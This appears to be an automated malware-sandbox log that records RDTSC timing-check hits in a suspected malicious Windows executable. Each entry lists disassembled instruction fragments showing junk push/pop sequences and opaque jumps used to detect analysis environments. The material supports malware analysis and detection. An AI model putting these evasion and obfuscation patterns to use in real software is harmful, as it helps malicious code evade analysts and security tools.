Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A06C18 second address: A06C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A06C1C second address: A06C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A970BC second address: A970DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0E38E1CB16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A970DB second address: A97103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A359h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A97103 second address: A97107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A97107 second address: A9710B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9710B second address: A97129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E38E1CB1Eh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A97398 second address: A9739D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A976F5 second address: A976FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0E38E1CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A976FF second address: A97703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A97703 second address: A97709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A97709 second address: A97734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A358h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E3850A34Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9D961 second address: A9D965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9D965 second address: A9D990 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F0E3850A361h 0x00000010 jmp 00007F0E3850A359h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9D990 second address: A9D9AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0E38E1CB23h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9D9AA second address: A9D9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E3850A346h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9D9B8 second address: A9D9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9C7F0 second address: A9C80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E3850A346h 0x0000000a jno 00007F0E3850A346h 0x00000010 jng 00007F0E3850A346h 0x00000016 popad 0x00000017 jc 00007F0E3850A356h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9C80F second address: A9C821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB1Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9C821 second address: A9C825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9C825 second address: A9C846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F0E38E1CB16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A9C9A9 second address: A9C9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe RDTSC instruction interceptor: First address: A3FFD0 second address: A40069 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E38E1CB18h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F0E38E1CB18h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D19C7h] 0x0000002f mov dword ptr [ebp+1247C698h], ebx 0x00000035 jc 00007F0E38E1CB21h 0x0000003b pushad 0x0000003c sub dword ptr [ebp+122D33ABh], eax 0x00000042 movzx esi, bx 0x00000045 popad 0x00000046 mov ebx, dword ptr [ebp+1248A06Ch] 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F0E38E1CB18h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 stc 0x00000067 add eax, ebx 0x00000069 mov ecx, 4B3FDB10h 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 jo 00007F0E38E1CB2Eh 0x00000077 jmp 00007F0E38E1CB28h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A40069 second address: A4008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E3850A34Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A9D66A second address: A9D68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jnp 00007F0E38E1CB16h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E38E1CB20h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA35A6 second address: AA35AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA35AC second address: AA35B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA35B0 second address: AA35BD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA35BD second address: AA35C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0E38E1CB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA36E3 second address: AA36E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA3D2E second address: AA3D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E38E1CB16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA3D38 second address: AA3D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA4A93 second address: AA4AA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007F0E38E1CB16h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AA4AA5 second address: AA4AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAEFF4 second address: AAF017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E38E1CB2Fh 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F0E38E1CB27h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAF017 second address: AAF01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAF01C second address: AAF034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB22h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAF034 second address: AAF05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E3850A34Dh 0x00000010 jmp 00007F0E3850A350h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE2E5 second address: AAE30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E38E1CB16h 0x0000000a jmp 00007F0E38E1CB27h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE30D second address: AAE311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE311 second address: AAE315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE927 second address: AAE945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A358h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE945 second address: AAE949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE949 second address: AAE978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E3850A34Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F0E3850A35Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AAE978 second address: AAE982 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E38E1CB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6384 second address: AB6393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6680 second address: AB6690 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E38E1CB16h 0x00000008 je 00007F0E38E1CB16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB67EC second address: AB67F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB67F0 second address: AB67F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB67F4 second address: AB67FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB67FA second address: AB6800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6800 second address: AB6805 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6979 second address: AB697D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB697D second address: AB6989 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007F0E3850A346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6989 second address: AB69AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0E38E1CB16h 0x0000000a jmp 00007F0E38E1CB28h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB69AB second address: AB69AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB69AF second address: AB69C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0E38E1CB22h 0x0000000e jg 00007F0E38E1CB16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB69C5 second address: AB69EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E3850A358h 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0E3850A346h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB69EC second address: AB69F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB69F0 second address: AB69FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB69FC second address: AB6A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6A00 second address: AB6A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB6CC9 second address: AB6CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F0E38E1CB1Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB7187 second address: AB719A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F0E3850A352h 0x0000000b jg 00007F0E3850A346h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB719A second address: AB71A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71A4 second address: AB71A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71A8 second address: AB71AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71AC second address: AB71B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71B2 second address: AB71E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E38E1CB27h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F0E38E1CB1Ch 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71E3 second address: AB71E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71E9 second address: AB71ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB71ED second address: AB71F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AB5E1E second address: AB5E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A08835 second address: A08849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E3850A34Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: A08849 second address: A0884F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AC02C2 second address: AC02F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Ch 0x00000007 jmp 00007F0E3850A34Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F0E3850A34Bh 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AC02F2 second address: AC02F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AC02F6 second address: AC02FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: ABFD7B second address: ABFD85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: ABFD85 second address: ABFD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: ACDD2B second address: ACDD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: ACD9E4 second address: ACDA31 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E3850A346h 0x00000008 jc 00007F0E3850A346h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F0E3850A358h 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F0E3850A350h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 js 00007F0E3850A346h 0x00000027 pushad 0x00000028 popad 0x00000029 pop esi 0x0000002a jmp 00007F0E3850A358h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AD05D5 second address: AD0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E38E1CB26h 0x0000000d js 00007F0E38E1CB1Ch 0x00000013 jl 00007F0E38E1CB16h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AD0603 second address: AD0607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AD8364 second address: AD8368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AD8368 second address: AD8381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: ADFA0A second address: ADFA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: ADFA0E second address: ADFA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AE29C4 second address: AE29C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AE29C8 second address: AE29D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA70A second address: AEA713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AEA713 second address: AEA719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AE925F second address: AE9271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\IERiUft8Wi.exeRDTSC instruction interceptor: First address: AE951B second address: AE9538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E3850A34Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0E3850A346h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
